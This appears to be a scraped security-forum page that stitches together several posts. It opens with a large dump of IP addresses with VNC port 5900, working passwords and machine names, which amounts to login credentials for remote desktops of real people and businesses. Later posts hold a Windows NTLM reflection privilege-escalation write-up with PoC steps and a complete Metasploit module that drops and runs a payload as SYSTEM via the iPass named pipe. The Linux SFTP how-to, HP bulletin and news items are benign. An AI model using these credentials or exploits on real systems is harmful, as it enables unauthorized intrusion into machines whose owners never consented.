81.218.162.69:5900-null-[Touch3G ] 81.198.84.242:5900-null-[administrator@administrator] 81.218.133.159:5900-null-[None] 81.215.200.69:5900-1-[FOREX] 81.222.88.198:5900-null-[QEMU (instance-000000c9)] 81.224.45.141:5900-null-[None] 81.219.27.68:5900-1-[supermarket ( 192.168.1.3 ) - service mode] 81.224.115.90:5900-null-[None] 81.225.48.235:5900-null-[None] 81.224.98.167:5900-null-[None] 81.225.19.126:5900-null-[None] 81.226.48.241:5900-null-[None] 81.227.16.231:5900-null-[None] 81.227.11.133:5900-null-[None] 81.227.35.212:5900-null-[None] 81.227.35.132:5900-null-[None] 81.224.135.60:5900-null-[None] 81.227.19.175:5900-null-[None] 81.227.36.131:5900-null-[None] 81.227.25.75:5900-null-[None] 81.196.98.235:5900-null-[None] 81.228.39.216:5900-null-[iX T10A] 81.229.48.225:5900-null-[None] 81.228.198.158:5900-null-[None] 81.231.164.234:5900-null-[E1070] 81.231.250.98:5900-null-[None] 81.231.104.217:5900-null-[None] 81.231.238.149:5900-null-[None] 81.232.19.148:5900-null-[E1070] 81.233.67.172:5900-null-[None] 81.233.152.54:5900-null-[None] 81.233.185.249:5900-null-[None] 81.233.178.19:5900-null-[None] 81.234.21.221:5900-null-[None] 81.233.255.165:5900-null-[E1032] 81.234.151.82:5900-null-[None] 81.235.131.41:5900-null-[None] 81.234.151.231:5900-null-[E1101] 81.235.206.92:5900-null-[None] 81.236.20.208:5900-null-[None] 81.236.210.216:5900-null-[None] 81.236.223.2:5900-null-[E1071] 81.236.217.233:5900-null-[None] 81.236.223.47:5900-null-[E1071] 81.205.181.92:5900-null-[None] 81.236.212.182:5900-null-[monlserv1:0] 81.217.199.131:5900-null-[None] 81.246.0.10:5900-null-[None] 81.248.75.21:5900-null-[None] 81.248.249.227:5900-null-[pop@201107455] 81.47.172.253:5900-12-[NCIS] 81.88.233.130:5900-12-[None] 81.171.155.42:5900-null-[QEMU (oVirtm)] 81.227.46.52:5900-null-[None] 81.236.254.106:5900-null-[None] 81.237.238.231:5900-null-[None] 81.10.2.210:5900-123-[None] 81.10.2.212:5900-123-[None] 81.22.204.192:5900-123-[WPRTA0040022] 81.59.2.90:5900-123-[x0vncserver] 81.137.245.179:5900-123-[None] 81.195.75.60:5900-123-[avto@avto] 81.237.222.113:5900-null-[None] 24.20.196.118:5900-1234-[your-92c71f85fb] 81.9.132.21:5900-1234-[iService Gestión] 81.15.224.218:5900-1234-[None] 81.43.98.123:5900-1234-[Adhoc MiniServer] 81.45.86.124:5900-1234-[server-tau ( 172.26.0.151 ) - service mode] 81.56.234.183:5900-1234-[EXTER T100] 81.56.198.245:5900-1234-[T12B] 81.57.125.74:5900-1234-[NOM-63E6AC54477] 81.88.239.5:5900-1234-[x0vncserver] 81.88.252.60:5900-1234-[x0vncserver] 81.88.252.120:5900-1234-[x0vncserver] 81.110.54.58:5900-1234-[Bryan’s Mac mini] 81.136.131.200:5900-1234-[ht5 ( 192.168.1.9 ) - service mode] 81.136.222.63:5900-1234-[E1061] 81.137.217.146:5900-1234-[kensington ( 192.168.1.98 ) - service mode] 81.139.177.145:5900-1234-[OSX-XSERVE-01] 81.174.3.2:5900-1234-[WinVNC] 81.174.140.197:5900-1234-[server ( 192.168.59.10 )] 81.149.231.78:5900-1234-[None] 81.182.75.133:5900-1234-[WLGHUN10-BPHUB3] 81.182.207.102:5900-1234-[WLGHUN10-BPHUT4] 81.192.101.124:5900-1234-[BUR140] 81.192.101.15:5900-1234-[BUR006] 81.218.191.1:5900-1234-[None] 81.218.152.62:5900-1234-[king@king-desktop] 81.235.158.185:5900-1234-[E1071] 81.245.51.62:5900-1234-[None] 81.246.250.200:5900-1234-[titanium ( 192.168.1.100 )] 81.248.174.88:5900-1234-[cvabym01 ( 192.168.1.11 )] 81.249.169.249:5900-1234-[GIGA4] 52.16.95.150:5900-12345-[None] 52.0.57.238:5900-12345-[IP-C0A898FD Microsoft Windows Server 2008 R2 Datacenter Edition Service Pack 1 (build 7601), 64-bit] 81.4.234.218:5900-12345-[borodulin’s Mac mini] 81.18.192.178:5900-12345-[MININT-9EE8VS5 Microsoft Windows 7 Professional Service Pack 1 (build 7601), 64-bit] 81.10.237.109:5900-12345-[Martins Mac mini] 81.136.247.116:5900-12345-[evigilo12337] 81.142.114.213:5900-12345-[NoiseMonitoringServer’s Mac mini] 81.142.114.208:5900-12345-[None] 81.142.114.211:5900-12345-[None] 81.142.114.209:5900-12345-[None] 81.142.114.214:5900-12345-[None] 81.142.114.215:5900-12345-[None] 81.142.114.210:5900-12345-[None] 81.142.114.212:5900-12345-[None] 81.219.141.230:5900-12345-[SRV-SB-WIESZ] 81.218.123.30:5900-12345-[apollo] 52.10.12.25:5900-123456-[WIN-LESQVADBMRU] 81.34.214.83:5900-123456-[DLR4-16 [000322120f40]] 81.44.68.7:5900-123456-[tpv004 ( 192.168.1.100 )] 81.82.240.218:5900-123456-[hpz220 ( 192.168.0.102 ) - service mode] 81.133.189.12:5900-123456-[aboutface1 ( 192.168.1.1 )] 81.153.186.122:5900-123456-[ucs160310] 81.200.27.43:5900-123456-[Encelad] 81.169.142.199:5900-1234567-[h2318994 ( 81.169.142.199 ) - service mode] 81.192.48.243:5900-null-[None] 81.32.168.98:5900-12345678-[DLR-2116 [000322162fbd]] 81.95.137.206:5900-12345678-[lift2 ( 81.95.137.206, 192.168.0.189 ) - service mode] 81.177.224.140:5900-12345678-[manager ( 192.168.0.108 ) - service mode] 81.182.26.218:5900-1234567890-[gertasrv ( 192.168.1.190 )] 81.253.43.3:5900-1234567890-[portable-or ( 172.17.105.170 )] 81.106.220.146:5900-password1-[James’s iMac] 81.80.209.132:5900-password1-[None] 81.140.83.142:5900-password1-[WinCEVNC] 81.142.228.102:5900-password1-[None] 81.149.26.104:5900-password1-[sqlserver ( 192.168.10.99 )] 81.174.169.5:5900-password1-[E1151] 81.193.157.38:5900-password1-[None] 81.255.31.88:5900-password1-[pc-de-stasdd ( 192.168.1.13 ) - service mode] 81.149.214.214:5900-password01-[2KSERVER] 81.211.17.70:5900-pass1-[VEEX V300 Series VNC Server] 81.30.136.215:5900-admin-[kasa ( 192.168.0.10 ) - service mode] 81.83.30.223:5900-admin-[Fileserver] 81.93.249.190:5900-admin-[OM20-81-93-249-190] 81.143.8.77:5900-admin-[Turtle’s Mac mini] 81.174.14.107:5900-admin-[casartelli-pc ( 192.58.3.235, 192.58.4.235 ) - service mode] 81.82.224.41:5900-P@ssword-[None] 81.82.237.60:5900-P@ssword-[veeam] 81.83.0.152:5900-P@ssword-[backup] 81.133.161.166:5900-P@ssword-[None] 81.240.252.89:5900-P@ssword-[None] 81.38.161.168:5900-qwerty123-[svrppv ( 192.168.30.2 )] 81.44.45.176:5900-qwerty123-[svrppv ( 192.168.34.2 )] 81.168.172.172:5900-qwerty-[mar-f370d6790f8 ( 192.168.240.99 )] 81.148.17.41:5900-remote-[Mark’s iMac] 81.168.90.243:5900-remote-[None] 81.203.6.253:5900-system-[altillo ( 192.168.1.11 ) - service mode] 24.29.173.112:5900-null-[eve@eve-1005HA] 24.24.26.118:5900-test-[headsup1] 81.83.13.201:5900-test-[xserve] 81.137.254.231:5900-hello123-[elleeshd1 ( 192.168.1.95 ) - service mode] 81.233.79.15:5900-support-[81-233-79-15-no73.business.telia.com:0] 81.233.79.192:5900-support-[81-233-79-192-no73.business.telia.com:0] 81.27.123.4:5900-master-[VC Project 'visu'] 81.43.111.240:5900-master-[VC Project 'visu'] 81.137.235.204:5900-master-[VC Project 'visu'] 81.159.79.102:5900-master-[BR06] 81.164.186.182:5900-master-[BR06] 81.169.139.211:5900-master-[VC Project 'visu'] 81.174.239.18:5900-master-[BR06] 81.174.239.19:5900-master-[BR06] 81.174.228.65:5900-master-[VC Project 'visu'] 81.243.240.92:5900-master-[VC Project 'visu'] 81.242.239.84:5900-master-[VC Project 'visu'] 81.245.232.82:5900-master-[VC Project 'visu'] 81.245.62.40:5900-master-[BR06] 81.246.204.78:5900-master-[BR06] 81.152.195.110:5900-letmein-[nigel@MUSIC] 81.82.234.116:5900-null-[None] 24.8.213.188:5900-apple-[17inch] 81.26.152.173:5900-111111-[ulu ( 10.10.0.175, 10.10.0.60, 81.26.152.173 ) - service mode] 81.82.240.39:5900-111111-[x0vncserver] 81.133.215.254:5900-111111-[T7A] 81.137.202.219:5900-pa55word-[macmini server] 81.174.165.102:5900-pa55word-[Colophon Server] 81.234.254.138:5900-null-[None] 88.2.196.195:5900-null-[None] 88.0.247.182:5900-null-[Cubie:0.0] 88.2.235.169:5900-null-[None] 88.5.23.112:5900-null-[QEMU] 88.12.13.187:5900-null-[Device 10001] 88.12.5.96:5900-null-[Device 10001] 88.12.44.45:5900-null-[Device 10001] 88.12.152.95:5900-null-[QEMU] 46.229.153.82:5900-null-[x11] 88.14.143.89:5900-null-[FORMACION3] 88.14.100.165:5900-null-[QEMU] 88.14.111.235:5900-null-[QEMU] 88.14.121.18:5900-null-[QEMU] 79.143.179.236:5900-null-[QEMU (static-farmmania)] 37.123.140.247:5900-null-[None] 78.70.20.118:5900-null-[x11] 37.123.141.88:5900-null-[None] 78.70.192.224:5900-null-[None] 37.123.186.100:5900-null-[None] 130.237.67.12:5900-null-[bajibabu@fant] 88.7.75.115:5900-null-[bfa@MicroServer] 79.143.161.228:5900-null-[tuco@dnevna] 212.116.80.42:5900-null-[None] 85.30.34.137:5900-null-[None] 85.30.55.0:5900-null-[None] 85.30.60.206:5900-null-[None] 85.30.154.152:5900-null-[None] 85.30.155.162:5900-null-[None] 213.66.136.156:5900-null-[None] 213.66.136.32:5900-null-[None] 85.30.57.208:5900-null-[None] 193.13.110.248:5900-null-[None] 193.13.36.238:5900-null-[None] 195.19.76.233:5900-null-[QEMU (rosabs3-abf-worker1)] 178.78.60.68:5900-1-[rk7server ( 192.168.0.99 ) - service mode] 5.133.132.127:5900-1-[None] 130.237.25.250:5900-null-[None] 121.8.202.84:5900-1-[gdeie1703160] 121.6.151.139:5900-1-[nlbugis-pc ( 192.168.1.100 )] 121.12.120.72:5900-null-[QEMU (we5dg)] 121.14.195.68:5900-null-[Xen-cms] 121.1.198.99:5900-null-[wavecast@wavecast-01] 128.2.90.39:5900-null-[None] 128.2.144.215:5900-null-[student@kali1] 128.2.144.136:5900-null-[student@kali1] 128.2.144.139:5900-null-[student@kali1] 128.2.144.138:5900-null-[student@kali1] 128.2.144.140:5900-null-[student@kali1] 128.6.17.244:5900-null-[Device 10002] 128.9.233.14:5900-null-[QEMU (instance-00000422)] 128.9.233.16:5900-null-[QEMU (instance-000000b5)] 128.9.233.18:5900-null-[QEMU (instance-000000b3)] 128.9.233.11:5900-null-[QEMU (instance-00000423)] 128.9.233.13:5900-null-[QEMU (instance-00000426)] 128.9.233.12:5900-null-[QEMU (instance-0000029b)] 128.2.214.34:5900-null-[None] 128.2.245.163:5900-null-[None] 128.2.245.165:5900-null-[None] 128.2.245.161:5900-null-[None] 128.6.17.243:5900-null-[None] 128.2.144.135:5900-null-[student@kali1] 88.12.42.82:5900-123-[DEHESASERVER] 187.58.122.9:5900-123-[svr01 ( 192.168.25.201 ) - service mode] 95.31.221.127:5900-123-[guestmsk] 121.8.181.165:5900-123-[gaoke-9pdwfvlke] 121.13.219.5:5900-123-[cpo-mis-5815] 95.31.137.96:5900-123-[maksimov@x01-policase-prod] 121.17.52.72:5900-123-[pc-20100901yzle] 88.2.222.98:5900-1234-[None] 88.3.119.122:5900-1234-[None] 78.70.14.226:5900-1234-[EXTER T40m] 5.228.58.178:5900-1234-[None] 121.6.181.205:5900-1234-[mah_pms ( 192.168.22.4 ) - application mode] 121.7.152.30:5900-1234-[d946gz ( 192.168.3.50 ) - application mode] 121.6.165.191:5900-1234-[d946gz ( 192.168.20.50 ) - application mode] 88.12.48.199:5900-12345-[WinVNC] 88.10.113.245:5900-12345-[Minerva Mac Server] 130.236.136.28:5900-12345-[None] 187.58.126.213:5900-12345-[SERVIDOR Microsoft Windows Server 2003 R2, Enterprise Edition Service Pack 2 (build 3790)] 128.8.138.146:5900-12345-[Julie Berry’s iMac] 212.116.173.41:5900-123456-[None] 212.116.173.42:5900-123456-[None] 81.200.27.43:5900-123456-[Encelad] 121.12.167.104:5900-123456-[OTHER] 107.6.13.189:5900-123456-[QEMU (WIN)] 107.6.44.202:5900-123456-[win-62fghkhguos ( 10.10.20.6, 107.6.44.202, 169.254.235.96 ) - service mode] 88.11.135.233:5900-12345678-[DVR [000322091864]] 121.6.146.222:5900-12345678-[posready7-pc ( 121.6.146.222, 192.168.1.1, 192.168.192.1 ) - service mode] 121.6.146.222:5900-1234567890-[posready7-pc ( 121.6.146.222, 192.168.1.1, 192.168.192.1 ) - service mode] 116.88.94.171:5900-0000-[server’s Mac mini] 95.215.99.206:5900-0000-[LKDS-ÏÊ] 79.143.81.46:5900-q1w2e3-[None] 88.0.26.187:5900-qwerty123-[svrppv ( 192.168.31.1 )] 88.5.181.31:5900-qwerty123-[srvppv ( 192.168.1.2, 192.168.25.60, 192.168.25.61 ) - service mode] 88.3.164.90:5900-qwerty123-[svrppv ( 192.168.17.1 )] 88.11.80.10:5900-qwerty123-[svrppv ( 192.168.37.1 )] 88.13.1.162:5900-qwerty123-[svrppv ( 192.168.10.1 )] 88.13.4.146:5900-qwerty123-[svrppv ( 192.168.28.1 )] 88.13.73.144:5900-qwerty123-[svrppv ( 192.168.60.1 )] 88.13.9.8:5900-qwerty123-[svrppv ( 192.168.18.2 )] 88.13.52.137:5900-qwerty123-[svrppv ( 192.168.13.1 )] 88.12.67.68:5900-qwerty123-[svrppv ( 192.168.25.1 )] 88.13.3.176:5900-qwerty123-[svrppv ( 192.168.61.2 )] 88.3.162.166:5900-qwerty123-[None] 88.13.62.54:5900-remote-[compaq] 128.2.75.121:5900-test-[Jim Hawthorne’s iMac] 121.7.222.155:5900-support-[None] 88.12.54.153:5900-master-[VC Project 'visu'] 107.6.13.71:5900-abc123-[QEMU (1066-eh-web1)]
  13. To be able to restric a Linux user to www folder and disable ssh access, in my example maned user_name, we should proceed some steps: 1) Edit file /etc/ssh/sshd_config and add the next lines AllowUsers [COLOR="#FF0000"]user_name[/COLOR] Match User [COLOR="#FF0000"]user_name[/COLOR] ChrootDirectory /var/www ForceCommand internal-sftp 2) Edit the file /etc/passwd like in the next example: [COLOR="#FF0000"]user_name[/COLOR]:1003:1002::/var/www:/bin/false 3) Add user to www-data group using command: usermod -a -G www-data [COLOR="#FF0000"]user_name[/COLOR] 4) The final step is to restart the ssh service to reload the configuration using one of the next commands: /etc/init.d/ssh restart or service ssh restart After this steps if we fill try to connect using ssh we will got the next message: root@kali:/home/razvan1# ssh [COLOR="#FF0000"]user_name[/COLOR]@192.168.1.1 [COLOR="#FF0000"]user_name[/COLOR]@192.168.1.1's password: This service allows sftp connections only. Connection to 192.168.1.1 closed. Author: razvan1@hy
  14. Source: https://code.google.com/p/google-security-research/issues/detail?id=222 Windows: Local WebDAV NTLM Reflection Elevation of Privilege Platform: Windows 8.1 Update, Windows 7 Class: Elevation of Privilege Summary: A default installation of Windows 7/8 can be made to perform a NTLM reflection attack through WebDAV which allows a local user to elevate privileges to local system. Description: NTLM reflection is a well known issue with Windows authentication. It’s typically abused in networked scenarios to reflect credentials from one machine to another. It used to be possible to reflect credentials back to the same machine but that was mitigated in MS08-068 by not honouring NTLM authentication sessions already in flight. However this did nothing to stop cross-protocol attacks. The WebClient service for WebDAV (which is installed and enabled by default, although you’d need to start it using its service trigger) also does NTLM authentication if the server requests it. As Windows has no block on binding to TCP ports < 1024 from a normal user account then we can setup our own WebDAV server running as a normal user bound to localhost (so also no firewall issues). If we can convince another user, ideally local system to connect to the WebDAV server we can start an NTLM authentication session. This can then be replayed locally to the TCP/IP CIFS service endpoint to authenticate as that user. If this was a local system account then that gives you full local admin privs, you can read/write any file on the system through the admin shares. You could also bind to local named pipes such as the service manager and create a new privileged service. I’d put money on there being many ways of getting local system to open an arbitrary file, but the easiest one to exploit is Windows Defender (at least on Windows 8.1). You can tell it to initiate a scan of a file which gets opened under the local system token. Of course this might be a bug in and of itself. No processing of the path is done, it seems to be passed directly to CreateFile. This will cause a webdav connection to start to localhost and then NTLM can be negotiated. I don’t believe I’ve changed the settings on my VMs which would enable this attack. Certainly reading Group Policy settings it seems like localsystem shouldn’t authenticate with the machine account by default, but it seems that you can. I’ve checked my security settings and they look correct. I’ve tested it on Windows 8.1 Update with defender, and on Windows 7 manually executing the open as local system and they both work. After a quick search I can’t find anyone documenting this for the purposes of local privilege escalation attacks although it’s perhaps an obvious way of abusing the functionality so I would expect this is not common knowledge. It is the sort of bug which could be being exploited in the wild considering all it needs is socket access (which is any user) and some way of convincing a privileged user to open the local webdav share. Of course no-doubt it can be effectively mitigated using SMB signing although it isn’t clear that the NTLM extended protection is doing anything to stop it. That said this works in a default installation even with file sharing effectively disabled (at least as far as the GUIs will allow). Even with signing enabled on the client I guess it’s possible that you can reflect the NTLM credentials to a local TCP DCE/RPC endpoint instead to achieve a similar effect. Also I wouldn’t be so sure that WebDAV is the only way of doing this. Again another one might be COM marshaling and specifying a endpoint locally (although it might be clever enough to not directly communicate for that one). Another use for this attack is for negotiating a local impersonation token for local system which could be used for Token Kidnapping purposes. Calling AcceptSecurityContext from any account with permissions to handle enterprise auth will be handed back an impersonation level token, even normal users. But of course network service etc would have most use for the token. Proof of Concept: I’ve provided a PoC which causes the Windows Defender service to open a WebDAV connection as Local System. This is for Windows 8.1 only as Windows 7’s defender doesn’t support the command as far as I know. The credentials are reflected to the local SMB service to write the file dummy.txt to the root of the C: drive. Of course more dangerous things could be done at this point. The PoC is written in Java just because it was the easiest to modify it’s library. No doubt an existing relay application could be repurposed, for example SmbRelay3 is supposed to be able to relay HTTP to SMB auth, but I didn’t try that. 1) Install latest Java 8 JRE. 2) Start the WebClient service, this could be done in many ways from a normal user, for now just start it using the service manager. 3) Extract the PoC to a directory. 4) Run “java -jar SmbTest.jar” in the extracted directory. This binds the WebDAV server then starts a scan with defender, after some seconds the exploit should run (there’s some slowness in everything starting). Repro Notes: If the PoC prints that the WebClient service isn’t started then start it. If no HTTP/NTLM traffic is printed to the console then webdav/mup had marked the server as down. Restart the webclient service and it should fix it. Expected Result: It shouldn’t be possible to elevate privileges, the SMB connection should fail to authenticate Observed Result: Authentication was successful as local system and a file written to the root of the C drive . Proof of Concept: http://www.exploit-db.com/sploits/36424.zip Source
  15. HP Security Bulletin HPSBST03298 1 - Potential security vulnerabilities have been identified with HP XP Service Processor Software for Windows. These vulnerabilities could be exploited resulting in a variety of outcomes. Code: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04600552 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04600552 Version: 1 HPSBST03298 rev.1 - HP XP Service Processor Software for Windows, Multiple Vulnerabilities NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2015-03-13 Last Updated: 2015-03-13 - ----------------------------------------------------------------------------- - --- Potential Security Impact: Multiple vulnerabilities Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP XP Service Processor Software for Windows. These vulnerabilities could be exploited resulting in a variety of outcomes. References: SSRT101826 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The following HP XP Service Processor Software for Windows is affected: HP XP7 HP XP10000 HP XP12000 HP XP20000 HP XP24000 HP XP P9500 BACKGROUND For a PGP signed version of this security bulletin please write to: security-alert@hp.com Microsoft has published Security Information Bulletins since January 2009. This bulletin presents all of the necessary patches and updates for HP XP Service Processor Software in a cummulative format. This information is updated monthly. Updating the HP XP Service Processor Software can be performed without interference or distruption to data flow on the XP product. RESOLUTION HP has made a web-based spread sheet available which lists all updates to the HP XP Service Processor Software that runs on the Microsoft Windows Operating System. The OS versions include Windows 7, Window Vista (64 and 32 bit) and Windows XP. The document may be downloaded from here: HP Insight Management - Overview In this HP Enterprise Information LIbrary , Select 'Storage' at the top, In the 'Products and Solutions' column, select 'XP Storage', In the 'Information Type' column, select only 'Service and Maintenance'. The HP XP Service Processor (SVP) OS Security Patch Summary Sheet may be downloaded to your desktop. HISTORY Version:1 (rev.1) - 13 March 2015 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: HP: Subscribe today Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned here in may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (GNU/Linux) iEYEARECAAYFAlUHov8ACgkQ4B86/C0qfVnbrgCg4oVyYhIvPf8/mkS/IwjWrMRg blEAn3uS87tqYInkFZtz8QNOjlVcU7l0 =6XaT -----END PGP SIGNATURE----- Source: http://dl.packetstormsecurity.net/1503-advisories/HPSBST03298-1.txt
  16. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Post::File include Msf::Exploit::FileDropper include Msf::Post::Windows::Priv include Msf::Post::Windows::Services def initialize(info={}) super(update_info(info, { 'Name' => 'iPass Mobile Client Service Privilege Escalation', 'Description' => %q{ The named pipe, \IPEFSYSPCPIPE, can be accessed by normal users to interact with the iPass service. The service provides a LaunchAppSysMode command which allows to execute arbitrary commands as SYSTEM. }, 'License' => MSF_LICENSE, 'Author' => [ 'h0ng10' # Vulnerability discovery, metasploit module ], 'Arch' => ARCH_X86, 'Platform' => 'win', 'SessionTypes' => ['meterpreter'], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Windows', { } ] ], 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'References' => [ ['URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-03.txt'] ], 'DisclosureDate' => 'Mar 12 2015', 'DefaultTarget' => 0 })) register_options([ OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)']) ], self.class) end def check os = sysinfo['OS'] unless os =~ /windows/i return Exploit::CheckCode::Safe end svc = service_info('iPlatformService') if svc && svc[:display] =~ /iPlatformService/ vprint_good("Found service '#{svc[:display]}'") if is_running? vprint_good('Service is running') else vprint_error('Service is not running!') end vprint_good('Opening named pipe...') handle = open_named_pipe('\\\\.\\pipe\\IPEFSYSPCPIPE') if handle.nil? vprint_error('\\\\.\\pipe\\IPEFSYSPCPIPE named pipe not found') return Exploit::CheckCode::Safe else vprint_good('\\\\.\\pipe\\IPEFSYSPCPIPE found!') session.railgun.kernel32.CloseHandle(handle) end return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end def open_named_pipe(pipe) invalid_handle_value = 0xFFFFFFFF r = session.railgun.kernel32.CreateFileA(pipe, 'GENERIC_READ | GENERIC_WRITE', 0x3, nil, 'OPEN_EXISTING', 'FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL', 0) handle = r['return'] return nil if handle == invalid_handle_value handle end def write_named_pipe(handle, command) buffer = Rex::Text.to_unicode(command) w = client.railgun.kernel32.WriteFile(handle, buffer, buffer.length, 4, nil) if w['return'] == false print_error('The was an error writing to pipe, check permissions') return false end true end def is_running? begin status = service_status('iPlatformService') rescue RuntimeError => e print_error('Unable to retrieve service status') return false end return status && status[:state] == 4 end def exploit if is_system? fail_with(Failure::NoTarget, 'Session is already elevated') end handle = open_named_pipe("\\\\.\\pipe\\IPEFSYSPCPIPE") if handle.nil? fail_with(Failure::NoTarget, "\\\\.\\pipe\\IPEFSYSPCPIPE named pipe not found") else print_status("Opended \\\\.\\pipe\\IPEFSYSPCPIPE! Proceeding...") end if datastore['WritableDir'] and not datastore['WritableDir'].empty? temp_dir = datastore['WritableDir'] else temp_dir = client.sys.config.getenv('TEMP') end print_status("Using #{temp_dir} to drop malicious exe") begin cd(temp_dir) rescue Rex::Post::Meterpreter::RequestError session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Config, "Failed to use the #{temp_dir} directory") end print_status('Writing malicious exe to remote filesystem') write_path = pwd exe_name = "#{rand_text_alpha(10 + rand(10))}.exe" begin write_file(exe_name, generate_payload_exe) register_file_for_cleanup("#{write_path}\\#{exe_name}") rescue Rex::Post::Meterpreter::RequestError session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Unknown, "Failed to drop payload into #{temp_dir}") end print_status('Sending LauchAppSysMode command') begin write_res = write_named_pipe(handle, "iPass.EventsAction.LaunchAppSysMode #{write_path}\\#{exe_name};;;") rescue Rex::Post::Meterpreter::RequestError session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Unknown, 'Failed to write to pipe') end unless write_res fail_with(Failure::Unknown, 'Failed to write to pipe') end end end Source
  17. Yahoo has launched an on-demand password service that lets forgetful customers tie their account security to their mobile phone. Yahoo director of product management Chris Stoner announced the service, which US users can opt into now. The 'On-demand passwords' feature can be activated in the security section of Yahoo accounts' settings menu. Once activated, the user will be instructed to enter their mobile phone number. From this point on, whenever the customer attempts to open their account Yahoo will send a custom unlock code to their phone, removing the need for them to remember a password. Stoner said the service is part of Yahoo's ongoing efforts to make account security easier for users. "We've all been there. You're logging into your email and you panic because you've forgotten your password. After racking your brain for what feels like hours, it finally comes to you. Phew," he said. "Today, we're hoping to make that process less anxiety-inducing by introducing on-demand passwords, which are texted to your mobile phone when you need them. You no longer have to memorise a difficult password to sign in to your account - what a relief." The service is available to US users now. There is no confirmed UK release date and at the time of publishing Yahoo had not responded to V3's request for comment on when it will roll out the service in Europe. The release follows reports that many users are still failing to take even basic cyber defence measures to protect their personal data. Yahoo CEO Marissa Mayer controversially revealed she does not lock her smartphone with a password or gesture, as it made unlocking the device "too time-consuming". Yahoo is one of many companies to experiment with alternative password security services. Apple and Samsung added biometric fingerprint scanners to their latest iPhone 6 and Galaxy S6 smartphones. Source
  18. Internet traffic for 167 important British Telecom customers—including a UK defense contractor that helps deliver the country's nuclear warhead program—were mysteriously diverted to servers in Ukraine before being passed along to their final destination. The snafu may have allowed adversaries to eavesdrop on or tamper with communications sent and received by the UK's Atomic Weapons Establishment, one of the affected British Telecom customers. Other organizations with hijacked traffic include defense contractor Lockheed Martin, Toronto Dominion Bank, Anglo-Italian helicopter company AgustaWestland, and the UK Department for Environment, according to a blog post published Friday by researchers from Dyn, a firm that helps companies monitor and control their online infrastructure. The diverted traffic appeared to be used to send e-mail and route virtual private networks, as well as for other purposes. As the picture above illustrates, the roundabout path caused the data to travel thousands of miles to the Ukrainian capital of Kiev before turning around, retracing that route, and being delivered to its normal hub in London. Unnecessarily sending the data to Kiev may have made it possible for employees with privileged network access to Ukrainian telecom provider Vega to monitor or tamper with data that wasn't encrypted end-to-end using strong cryptography. The hijacking of the Atomic Weapons Establishment, Lockheed, and the other 165 routes occurred over a 90-minute span on Thursday, while a handful of British Telecom customers experienced diverted traffic for five days beginning Saturday. "The 167 hijacked prefixes (listed below) also included more innocuous networks like those of Pepsi Cola (165.197.56.0/22) and Wal-Mart UK (161.163.166.0/24 and 161.163.177.0/24)," Dyn Director of Internet analysis Doug Madory wrote. "However, these networks do host domains with 'VPN' and 'mail' in their names, implying they provide important services for these companies. Does this list represent some curious mistake or something more? Either way, it redirected a portion of Internet traffic bound for networks, at a minimum resulting in poor performance for some customers." It's not the first time that significant chunks of Internet traffic have been diverted to distant locations for unexplained reasons. In late 2013, Dyn researchers reported that data belonging to financial institutions, government agencies, and network service providers were mysteriously redirected to routers at Belarusian or Icelandic service providers. The hijackings occurred during at least 38 distinct events over a nine-month span that began in February of that year. The diversions are the result of the implicit trust placed in the border gateway protocol used to exchange data between large service providers and their customers, which include financial institutions, governments, network service providers, pharmaceutical and aerospace companies, and other sensitive organizations. As Ars explained in November, 2013: The full list of 167 customers affected is: 212.162.232.0/24 Cofunds Ltd (GB) 148.253.220.0/23 Department for Environment, Food and Rural Affairs (DEFRA) (GB) 61.28.211.0/24 Servcorp (GB) 86.128.0.0/11 BT Infrastructure Layer (GB) 86.128.0.0/12 BT Infrastructure Layer (GB) 193.32.254.0/24 Marks and Spencer PLC (GB) 194.70.94.0/24 Dabs Direct PLC (GB) 148.252.5.0/24 Department for Environment, Food and Rural Affairs (DEFRA) (GB) 37.235.123.0/24 Submission Technology Ltd (GB) 194.169.34.0/24 AgustaWestland Ltd (GB) 81.128.0.0/12 BT Infrastructure Layer (GB) 143.159.0.0/16 INFONET Services Corporation (GB) 147.148.0.0/14 Various Registries (Maintained by ARIN) 